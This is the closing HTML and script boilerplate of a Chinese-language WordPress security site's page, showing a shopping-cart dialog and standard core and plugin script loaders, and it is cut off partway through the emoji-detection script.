<!-- Render the cart. --> <div class="is-layout-flow wp-container-surecart-slide-out-cart-is-layout-d6743c7d wp-block-surecart-slide-out-cart-is-layout-flow" data-wp-context='{"formId":131,"mode":"live"}' data-wp-interactive='{ "namespace": "surecart/checkout" }' data-wp-init="callbacks.init" data-wp-watch="callbacks.onChangeCheckout" data-wp-on-window--storage="callbacks.syncTabs" > <dialog style="width: 525px; font-size:15px;" class="sc-drawer sc-cart-drawer wp-block-surecart-slide-out-cart" data-wp-bind--aria-label="surecart/cart::state.ariaLabel" data-wp-on--mousedown="surecart/cart::actions.closeOverlay" data-wp-on--touchstart="surecart/cart::actions.closeOverlay" > <!-- Cart alert --> <div class="sc-alert sc-alert__alert--danger" role="alert" aria-live="assertive" aria-atomic="true" data-wp-bind--hidden="!state.error" hidden> <div class="sc-alert__icon"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10" /> <line x1="12" y1="8" x2="12" y2="12" /> <line x1="12" y1="16" x2="12.01" y2="16" /> </svg> </div> <div class="sc-alert__text"> <div class="sc-alert__title"> <span data-wp-text="state.errorTitle"></span> </div> <div class="sc-alert__message"> <div data-wp-text="state.errorMessage"></div> <template data-wp-each--message="state.additionalErrors"> <div> <span data-wp-text="context.message"></span> </div> </template> </div> </div> </div> <div class="wp-block-group is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-09de181c wp-block-group-is-layout-flex" style="padding-top:1.5em;padding-right:2em;padding-bottom:0em;padding-left:2em"> <div style="line-height:1;" class="wp-block-surecart-cart-close-button" data-wp-on--click="surecart/cart::actions.toggle" data-wp-on--keypress="surecart/cart::actions.toggle" role="button" tabindex="0" aria-label="關閉購物車" > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="5" y1="12" x2="19" y2="12" /> <polyline points="12 5 19 12 12 19" /> </svg> </div> <p style="margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;font-size:16px;font-style:normal;font-weight:500;line-height:1"> 查看我的訂單</p> <span style="font-size:14px;font-weight:600;line-height:1; border-radius:4px; padding-top:6px;padding-bottom:6px;padding-left:10px;padding-right:10px;" class="wp-block-surecart-cart-count" data-wp-text="state.itemsCount">0</span> </div> <div style="padding-top:2em;padding-bottom:2em;padding-left:2em;padding-right:2em;" class="wp-block-surecart-slide-out-cart-line-items is-layout-flow wp-container-surecart-slide-out-cart-line-items-is-layout-546f3c6d wp-block-surecart-slide-out-cart-line-items-is-layout-flow" role="list"> <template data-wp-each--line_item="state.checkoutLineItems" data-wp-each-key="context.line_item.id" > <div class="sc-product-line-item" data-wp-class--sc-product-line-item--has-swap="state.swap" role="listitem"> <div class="sc-product-line-item__content"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"> <div class="wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-bd3f9bef wp-block-group-is-layout-flex"> <figure class="sc-cart-line-item-image-wrap wp-container-content-962be591 wp-duotone-unset-1" data-wp-bind--hidden="!context.line_item.image.src"> <img style="aspect-ratio:1;border-radius:4px;border-width:1px;margin-top:0;margin-bottom:0; margin-top:0;margin-bottom:0;" class="sc-is-covered wp-block-surecart-cart-line-item-image" data-wp-bind--alt="context.line_item.image.alt" data-wp-bind--srcset="context.line_item.image.srcset" data-wp-bind--sizes="context.line_item.image.sizes" data-wp-bind--src="context.line_item.image.src" loading="lazy" /> </figure> <div class="wp-block-group wp-container-content-9cfa9a5a is-vertical is-content-justification-stretch is-nowrap is-layout-flex wp-container-core-group-is-layout-a46423eb wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-eb80f53d wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <a style="font-style:normal;font-weight:500;line-height:1.4;text-decoration:none;" class="wp-block-surecart-cart-line-item-title" data-wp-bind--href="state.lineItemPermalink"> <span data-wp-text="context.line_item.price.product.name"></span> </a> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <div style="font-size:14px;line-height:1.4;" class="wp-block-surecart-cart-line-item-price-name" data-wp-text="state.lineItemPriceName" data-wp-bind--hidden="!state.lineItemPriceName"></div> <div style="font-size:14px;line-height:1.4;" class="wp-block-surecart-cart-line-item-variant" data-wp-text="state.lineItemVariant" data-wp-bind--hidden="!state.lineItemVariant"></div> <div data-wp-interactive='{ "namespace": "surecart/line-item-note" }' style="font-size:14px;line-height:1.4;" class="wp-block-surecart-cart-line-item-note" data-wp-context='{}' data-wp-run="callbacks.init" data-wp-class--line-item-note--is-expanded="context.noteExpanded" data-wp-class--line-item-note--is-collapsible="context.showToggle" data-wp-bind--hidden="surecart/checkout::!state.lineItemNote" data-wp-on--click="actions.toggleNoteExpanded" data-wp-on--keydown="actions.toggleNoteExpanded" data-wp-bind--role="button" data-wp-bind--disabled="!context.showToggle" data-wp-bind--aria-expanded="context.noteExpanded" data-wp-bind--aria-label="Toggle note visibility" tabindex="0" > <div class="line-item-note__text" data-wp-text="surecart/checkout::state.lineItemNote" ></div> <span class="sc-icon" data-wp-class--sc-icon--rotated="context.noteExpanded" > <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <polyline points="6 9 12 15 18 9" /> </svg> </span> </div> </div></div> <div class="sc-product-line-item__purchasable-status wp-block-surecart-cart-line-item-status has-text-align-right" data-wp-text="context.line_item.purchasable_status_display" data-wp-bind--hidden="!context.line_item.purchasable_status_display" role="status" aria-live="polite" aria-atomic="true" > </div> </div></div> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <div class="wp-block-group is-content-justification-right is-nowrap is-layout-flex wp-container-core-group-is-layout-f8a47911 wp-block-group-is-layout-flex" style="line-height:1.4"> <div class="wp-block-surecart-cart-line-item-scratch-amount" data-wp-text="context.line_item.scratch_display_amount" data-wp-bind--hidden="!state.lineItemHasScratchAmount" ></div> <div style="font-style:normal;font-weight:500;" class="wp-block-surecart-cart-line-item-amount has-text-align-right" data-wp-text="context.line_item.subtotal_display_amount"></div> <div style="font-size:14px;" class="wp-block-surecart-cart-line-item-interval" data-wp-bind--hidden="!context.line_item.price.short_interval_text"> <span class="wp-block-surecart-cart-line-item-interval__interval" data-wp-bind--hidden="!context.line_item.price.short_interval_text" data-wp-text="context.line_item.price.short_interval_text" ></span> <span class="wp-block-surecart-cart-line-item-interval__count" data-wp-bind--hidden="!context.line_item.price.short_interval_count_text" data-wp-text="context.line_item.price.short_interval_count_text" ></span> </div> </div> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <div style="font-size:14px;" class="wp-block-surecart-cart-line-item-trial has-text-align-right" data-wp-bind--hidden="!context.line_item.price.trial_text" data-wp-text="context.line_item.price.trial_text" ></div> <template data-wp-each--fee="state.lineItemFees" data-wp-each-key="context.fee.id" > <div style="font-size:14px;" class="wp-block-surecart-cart-line-item-fees has-text-align-right"> <span style="font-size:14px;" class="wp-block-surecart-cart-line-item-fees has-text-align-right" data-wp-text="context.fee.display_amount" ></span> <span style="font-size:14px;" class="wp-block-surecart-cart-line-item-fees has-text-align-right" data-wp-text="context.fee.description" ></span> </div> </template> </div></div> </div></div> </div> <div class="wp-block-group is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-c0dd7891 wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"><div class="sc-input-group sc-input-group-sm sc-quantity-selector wp-block-surecart-cart-line-item-quantity" data-wp-class--quantity--disabled="state.isQuantityDisabled" data-wp-bind--hidden="!state.isEditable" hidden="1"> <div class="sc-input-group-text sc-quantity-selector__decrease" role="button" tabindex="0" data-wp-on--click="surecart/checkout::actions.onQuantityDecrease" data-wp-on--keydown="surecart/checkout::actions.onQuantityDecrease" data-wp-bind--disabled="state.isQuantityDecreaseDisabled" data-wp-bind--aria-disabled="state.isQuantityDecreaseDisabled" data-wp-class--button--disabled="state.isQuantityDecreaseDisabled" aria-label="數量減少一個。." > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="5" y1="12" x2="19" y2="12" /> </svg> </div> <input type="number" class="sc-form-control sc-quantity-selector__control" data-wp-bind--value="context.line_item.quantity" data-wp-on--change="surecart/checkout::actions.onQuantityChange" data-wp-bind--min="context.line_item.min" data-wp-bind--aria-valuemin="context.line_item.min" data-wp-bind--max="context.line_item.max" data-wp-bind--aria-valuemax="context.line_item.max" data-wp-bind--disabled="surecart/checkout::state.loading" step="1" autocomplete="off" role="spinbutton" /> <div class="sc-input-group-text sc-quantity-selector__increase" role="button" tabindex="0" data-wp-on--click="surecart/checkout::actions.onQuantityIncrease" data-wp-on--keydown="surecart/checkout::actions.onQuantityIncrease" data-wp-bind--disabled="state.isQuantityIncreaseDisabled" data-wp-bind--aria-disabled="state.isQuantityIncreaseDisabled" data-wp-class--button--disabled="state.isQuantityIncreaseDisabled" aria-label="數量增加一個。." > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="12" y1="5" x2="12" y2="19" /> <line x1="5" y1="12" x2="19" y2="12" /> </svg> </div> </div> </div></div> <div class="wp-block-group is-vertical is-content-justification-right is-layout-flex wp-container-core-group-is-layout-4269a6fd wp-block-group-is-layout-flex"> <div style="font-size:14px;font-style:normal;font-weight:400;" class="wp-block-surecart-cart-line-item-remove" aria-label="移除項目" data-wp-on--click="surecart/checkout::actions.removeLineItem" data-wp-on--keydown="surecart/checkout::actions.removeLineItem" role="button" tabindex="0" > <svg class="wp-block-surecart-cart-line-item-remove__icon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="18" y1="6" x2="6" y2="18" /> <line x1="6" y1="6" x2="18" y2="18" /> </svg> <span class="wp-block-surecart-cart-line-item-remove__label"> 移除 </span> </div> </div> </div> </div> </div> </div></div> </div> <div class="sc-product-line-item__swap" data-wp-bind--hidden="!state.swap" hidden data-wp-on--click="actions.toggleSwap"> <div class="sc-product-line-item__swap-content"> <button type="button" class="sc-toggle" role="switch" aria-checked="false" data-wp-bind--aria-checked="context.line_item.swap" data-wp-class--sc-toggle--checked="context.line_item.swap"> <span class="sc-toggle__label">使用設置</span> <span aria-hidden="true" class="sc-toggle__knob"></span> </button> <span data-wp-text="state.swap.description"></span> </div> <div class="sc-product-line-item__swap-amount"> <span data-wp-text="state.swapDisplayAmount" class="sc-product-line-item__swap-amount-value"></span> <span data-wp-text="state.swapIntervalText" class="sc-product-line-item__swap-amount-interval"></span> <span data-wp-text="state.swapIntervalCountText" class="sc-product-line-item__swap-amount-interval-count"></span> </div> </div> </div> </template> </div> <div class="wp-block-group" style="border-top-color:#b0b0b069;border-top-width:1px;padding-top:2em;padding-right:2em;padding-bottom:2em;padding-left:2em"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"> <div class="wp-block-surecart-slide-out-cart-items-subtotal is-content-justification-space-between is-nowrap is-layout-flex wp-container-surecart-slide-out-cart-items-subtotal-is-layout-7351673c wp-block-surecart-slide-out-cart-items-subtotal-is-layout-flex"> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <p style="margin-top:0px;margin-bottom:0px;font-size:18px;font-style:normal;font-weight:500;line-height:1.4"> 小計</p> <p class="has-text-color has-link-color wp-elements-259a359c4f6cc8e462a71fb52c1b4088" style="color:var(--sc-input-help-text-color);font-size:14px;line-height:1.4">稅金和運費在結帳時計算</p> </div></div> <span style="font-size:18px;font-style:normal;font-weight:500;line-height:1.4;" class="wp-block-surecart-cart-subtotal-amount" data-wp-text="state.checkout.subtotal_display_amount"></span> </div> <div class="sc-cart-items-submit__wrapper" style="" > <div class="wp-block-button"> <a style="border-radius:4px;" class="wp-block-button__link wp-element-button sc-button__link wp-block-surecart-slide-out-cart-items-submit" href="https://wp-security.org/zh/checkout/" data-wp-bind--disabled="state.loading" data-wp-class--sc-button__link--busy="state.loading" > <span class="sc-spinner" aria-hidden="false"></span> <span class="sc-button__link-text">結帳</span> </a> </div> </div> </div></div> <div class="sc-block-ui" data-wp-bind--hidden="!state.loading" hidden></div> <!-- speak element --> <p id="a11y-speak-intro-text" class="a11y-speak-intro-text" style="position: absolute;margin: -1px;padding: 0;height: 1px;width: 1px;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);-webkit-clip-path: inset(50%);clip-path: inset(50%);border: 0;word-wrap: normal !important;"></p> <div id="a11y-speak-assertive" class="a11y-speak-region" style="position: absolute;margin: -1px;padding: 0;height: 1px;width: 1px;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);-webkit-clip-path: inset(50%);clip-path: inset(50%);border: 0;word-wrap: normal !important;" aria-live="assertive" aria-relevant="additions text" aria-atomic="true"> </div> <div id="a11y-speak-polite" class="a11y-speak-region" style="position: absolute;margin: -1px;padding: 0;height: 1px;width: 1px;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);-webkit-clip-path: inset(50%);clip-path: inset(50%);border: 0;word-wrap: normal !important;" aria-live="polite" aria-relevant="additions text" aria-atomic="true"></div> </dialog> </div> <!-- Render floating cart icon --> <div data-wp-interactive='{ "namespace": "surecart/checkout" }' class="wp-block-surecart-cart-icon" data-wp-context='{"formId":131,"mode":"live"}' data-wp-on--click="surecart/cart::actions.toggle" data-wp-on--keydown="surecart/cart::actions.toggle" tabindex="0" role="button" data-wp-bind--hidden="!state.hasItems" hidden> <div class="wp-block-surecart-cart-icon__container"> <div class="wp-block-surecart-cart-icon__icon" aria-label="購物車按鈕。."> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <path d="M6 2L3 6v14a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2V6l-3-4z" /> <line x1="3" y1="6" x2="21" y2="6" /> <path d="M16 10a4 4 0 0 1-8 0" /> </svg> </div> <span class="wp-block-surecart-cart-icon__count" data-wp-text="state.itemsCount" data-wp-bind--aria-label="state.itemsCountAriaLabel" >0</span> </div> </div><script src="https://wp-security.org/wp-includes/js/dist/url.min.js?ver=9e178c9516d1222dc834" id="wp-url-js"></script>
<script src="https://wp-security.org/wp-includes/js/dist/hooks.min.js?ver=dd5603f07f9220ed27f1" id="wp-hooks-js"></script>
<script src="https://wp-security.org/wp-includes/js/dist/i18n.min.js?ver=c26c3dc7bed366793375" id="wp-i18n-js"></script>
<script id="wp-i18n-js-after">
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
//# sourceURL=wp-i18n-js-after
</script>
<script id="wp-api-fetch-js-translations">
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
} )( "default", {"translation-revision-date":"2022-07-15 14:05:27+0000","generator":"GlotPress\/4.0.1","domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=1; plural=0;","lang":"zh_HK"},"An unknown error occurred.":["\u767c\u751f\u672a\u77e5\u7684\u932f\u8aa4\u3002"],"The response is not a valid JSON response.":["\u7121\u6548\u7684 JSON \u56de\u61c9\u3002"],"Media upload failed. If this is a photo or a large image, please scale it down and try again.":["\u5a92\u9ad4\u4e0a\u8f09\u5931\u6557\u3002\u5982\u679c\u9019\u662f\u7167\u7247\u6216\u5927\u578b\u5c3a\u5bf8\u5716\u7247\uff0c\u8acb\u5148\u7e2e\u5c0f\u5c3a\u5bf8\u518d\u4e0a\u8f09\u3002"],"You are probably offline.":["\u9019\u500b\u7db2\u7ad9\u76ee\u524d\u53ef\u80fd\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002"]}},"comment":{"reference":"wp-includes\/js\/dist\/api-fetch.js"}} );
//# sourceURL=wp-api-fetch-js-translations
</script>
<script src="https://wp-security.org/wp-includes/js/dist/api-fetch.min.js?ver=3a4d9af2b423048b0dee" id="wp-api-fetch-js"></script>
<script id="wp-api-fetch-js-after">
wp.apiFetch.use( wp.apiFetch.createRootURLMiddleware( "https://wp-security.org/zh/wp-json/" ) );
wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "64c71c308e" );
wp.apiFetch.use( wp.apiFetch.nonceMiddleware );
wp.apiFetch.use( wp.apiFetch.mediaUploadMiddleware );
wp.apiFetch.nonceEndpoint = "https://wp-security.org/wp-admin/admin-ajax.php?action=rest-nonce";
//# sourceURL=wp-api-fetch-js-after
</script>
<script src="https://wp-security.org/wp-includes/js/dist/dom-ready.min.js?ver=f77871ff7694fffea381" id="wp-dom-ready-js"></script>
<script id="wp-a11y-js-translations">
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
} )( "default", {"translation-revision-date":"2022-07-15 14:05:27+0000","generator":"GlotPress\/4.0.1","domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=1; plural=0;","lang":"zh_HK"},"Notifications":["\u901a\u77e5"]}},"comment":{"reference":"wp-includes\/js\/dist\/a11y.js"}} );
//# sourceURL=wp-a11y-js-translations
</script>
<script src="https://wp-security.org/wp-includes/js/dist/a11y.min.js?ver=cb460b4676c94bd228ed" id="wp-a11y-js"></script>
<script id="trp-dynamic-translator-js-extra">
var trp_data = {"trp_custom_ajax_url":"https://wp-security.org/wp-content/plugins/translatepress-multilingual/includes/trp-ajax.php","trp_wp_ajax_url":"https://wp-security.org/wp-admin/admin-ajax.php","trp_language_to_query":"zh_HK","trp_original_language":"en_US","trp_current_language":"zh_HK","trp_skip_selectors":["[data-no-translation]","[data-no-dynamic-translation]","[data-trp-translate-id-innertext]","script","style","head","trp-span","translate-press","[data-trp-translate-id]","[data-trpgettextoriginal]","[data-trp-post-slug]"],"trp_base_selectors":["data-trp-translate-id","data-trpgettextoriginal","data-trp-post-slug"],"trp_attributes_selectors":{"text":{"accessor":"outertext","attribute":false},"block":{"accessor":"innertext","attribute":false},"image_src":{"selector":"img[src]","accessor":"src","attribute":true},"submit":{"selector":"input[type='submit'],input[type='button'], input[type='reset']","accessor":"value","attribute":true},"placeholder":{"selector":"input[placeholder],textarea[placeholder]","accessor":"placeholder","attribute":true},"title":{"selector":"[title]","accessor":"title","attribute":true},"a_href":{"selector":"a[href]","accessor":"href","attribute":true},"button":{"accessor":"outertext","attribute":false},"option":{"accessor":"innertext","attribute":false},"aria_label":{"selector":"[aria-label]","accessor":"aria-label","attribute":true},"video_src":{"selector":"video[src]","accessor":"src","attribute":true},"video_poster":{"selector":"video[poster]","accessor":"poster","attribute":true},"video_source_src":{"selector":"video source[src]","accessor":"src","attribute":true},"audio_src":{"selector":"audio[src]","accessor":"src","attribute":true},"audio_source_src":{"selector":"audio source[src]","accessor":"src","attribute":true},"picture_image_src":{"selector":"picture image[src]","accessor":"src","attribute":true},"picture_source_srcset":{"selector":"picture source[srcset]","accessor":"srcset","attribute":true}},"trp_attributes_accessors":["outertext","innertext","src","value","placeholder","title","href","aria-label","poster","srcset"],"gettranslationsnonceregular":"784a8bfef0","showdynamiccontentbeforetranslation":"","skip_strings_from_dynamic_translation":[],"skip_strings_from_dynamic_translation_for_substrings":{"href":["amazon-adsystem","googleads","g.doubleclick"]},"duplicate_detections_allowed":"100","trp_translate_numerals_opt":"no","trp_no_auto_translation_selectors":["[data-no-auto-translation]"]};
//# sourceURL=trp-dynamic-translator-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/translatepress-multilingual/assets/js/trp-translate-dom-changes.js?ver=3.0.7" id="trp-dynamic-translator-js"></script>
<script src="https://wp-security.org/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.1.4" id="swv-js"></script>
<script id="contact-form-7-js-before">
var wpcf7 = {
"api": {
"root": "https:\/\/wp-security.org\/zh\/wp-json\/",
"namespace": "contact-form-7\/v1"
},
"cached": 1
};
//# sourceURL=contact-form-7-js-before
</script>
<script src="https://wp-security.org/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.1.4" id="contact-form-7-js"></script>
<script id="disqus_count-js-extra">
var countVars = {"disqusShortname":"wp-security-org"};
//# sourceURL=disqus_count-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/disqus-comment-system/public/js/comment_count.js?ver=3.1.4" id="disqus_count-js"></script>
<script id="disqus_embed-js-extra">
var embedVars = {"disqusConfig":{"integration":"wordpress 3.1.4 6.9"},"disqusIdentifier":"803 https://wp-security.org/uncategorized/hong-kong-security-ngo-warns-wordpress-xsscve20258685/","disqusShortname":"wp-security-org","disqusTitle":"Hong Kong Security NGO warns WordPress XSS(CVE20258685)","disqusUrl":"https://wp-security.org/zh/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/","postId":"803"};
//# sourceURL=disqus_embed-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/disqus-comment-system/public/js/comment_embed.js?ver=3.1.4" id="disqus_embed-js"></script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/basic-elements/public/js/public-powerkit-basic-elements.js?ver=4.0.0" id="powerkit-basic-elements-js"></script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/justified-gallery/block/jquery.justifiedGallery.min.js?ver=2.5.1" id="justifiedgallery-js"></script>
<script id="powerkit-justified-gallery-js-extra">
var powerkitJG = {"rtl":""};
//# sourceURL=powerkit-justified-gallery-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/justified-gallery/public/js/public-powerkit-justified-gallery.js?ver=3.0.4" id="powerkit-justified-gallery-js"></script>
<script src="https://wp-security.org/wp-includes/js/imagesloaded.min.js?ver=5.0.0" id="imagesloaded-js"></script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/lightbox/public/js/glightbox.min.js?ver=3.0.4" id="glightbox-js"></script>
<script id="powerkit-lightbox-js-extra">
var powerkit_lightbox_localize = {"text_previous":"Previous","text_next":"Next","text_close":"Close","text_loading":"Loading","text_counter":"of","single_image_selectors":".entry-content img,.single .post-media img","gallery_selectors":".wp-block-gallery,.gallery","exclude_selectors":".sight-portfolio-area","zoom_icon":"1"};
//# sourceURL=powerkit-lightbox-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/lightbox/public/js/public-powerkit-lightbox.js?ver=3.0.4" id="powerkit-lightbox-js"></script>
<script id="powerkit-opt-in-forms-js-extra">
var opt_in = {"ajax_url":"https://wp-security.org/wp-admin/admin-ajax.php","warning_privacy":"Please confirm that you agree with our policies.","is_admin":"","server_error":"Server error occurred. Please try again later."};
//# sourceURL=powerkit-opt-in-forms-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/opt-in-forms/public/js/public-powerkit-opt-in-forms.js?ver=3.0.4" id="powerkit-opt-in-forms-js"></script>
<script async="async" defer="defer" src="//assets.pinterest.com/js/pinit.js?ver=6.9" id="powerkit-pinterest-js"></script>
<script id="powerkit-pin-it-js-extra">
var powerkit_pinit_localize = {"image_selectors":".entry-content img","exclude_selectors":".cnvs-block-row,.cnvs-block-section,.cnvs-block-posts .entry-thumbnail,.cnvs-post-thumbnail,.pk-block-author,.pk-featured-categories img,.pk-inline-posts-container img,.pk-instagram-image,.pk-subscribe-image,.wp-block-cover,.pk-block-posts,.sight-portfolio-entry-link-page","only_hover":"1"};
//# sourceURL=powerkit-pin-it-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/pinterest/public/js/public-powerkit-pin-it.js?ver=3.0.4" id="powerkit-pin-it-js"></script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/scroll-to-top/public/js/public-powerkit-scroll-to-top.js?ver=3.0.4" id="powerkit-scroll-to-top-js"></script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/share-buttons/public/js/public-powerkit-share-buttons.js?ver=3.0.4" id="powerkit-share-buttons-js"></script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/slider-gallery/block/flickity.pkgd.min.js?ver=2.5.1" id="flickity-js"></script>
<script id="powerkit-slider-gallery-js-extra">
var powerkit_sg_flickity = {"page_info_sep":" of "};
//# sourceURL=powerkit-slider-gallery-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/slider-gallery/public/js/public-powerkit-slider-gallery.js?ver=3.0.4" id="powerkit-slider-gallery-js"></script>
<script id="powerkit-table-of-contents-js-extra">
var powerkit_toc_config = {"label_show":"Show","label_hide":"Hide"};
//# sourceURL=powerkit-table-of-contents-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/table-of-contents/public/js/public-powerkit-table-of-contents.js?ver=3.0.4" id="powerkit-table-of-contents-js"></script>
<script src="https://wp-security.org/wp-content/plugins/sight/render/js/jquery.magnific-popup.min.js?ver=1754493394" id="magnific-popup-js"></script>
<script id="sight-block-script-js-extra">
var sight_lightbox_localize = {"text_previous":"Previous","text_next":"Next","text_close":"Close","text_loading":"Loading","text_counter":"of"};
//# sourceURL=sight-block-script-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/sight/render/js/sight.js?ver=1754493394" id="sight-block-script-js"></script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/posts/block-posts/colcade.js?ver=2.5.1" id="colcade-js"></script>
<script src="https://wp-security.org/wp-content/themes/squaretype/js/ofi.min.js?ver=3.2.3" id="object-fit-images-js"></script>
<script id="csco-scripts-js-extra">
var csco_mega_menu = {"rest_url":"https://wp-security.org/zh/wp-json/csco/v1/menu-posts","current_lang":"","current_locale":"zh_HK"};
//# sourceURL=csco-scripts-js-extra
</script>
<script src="https://wp-security.org/wp-content/themes/squaretype/js/scripts.js?ver=3.1.1" id="csco-scripts-js"></script>
<script src="https://wp-security.org/wp-includes/js/comment-reply.min.js?ver=6.9" id="comment-reply-js" async data-wp-strategy="async" fetchpriority="low"></script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://wp-security.org/wp-includes/js/wp-emoji-release.min.js?ver=6.9"}}
</script>
<script type="module">
/*! This file is auto-generated */
const a=JSON.parse(document.getElementById("wp-emoji-settings").textContent),o=(window._wpemojiSettings=a,"wpEmojiSettingsSupports"),s=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const a=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===a[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,a){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!a(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,a){let r;const o=(r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),s=(o.textBaseline="top",o.font="600 32px Arial",{});return e.forEach(e=>{s[e]=t(o,e,n,a)}),s}function r(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}a.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof 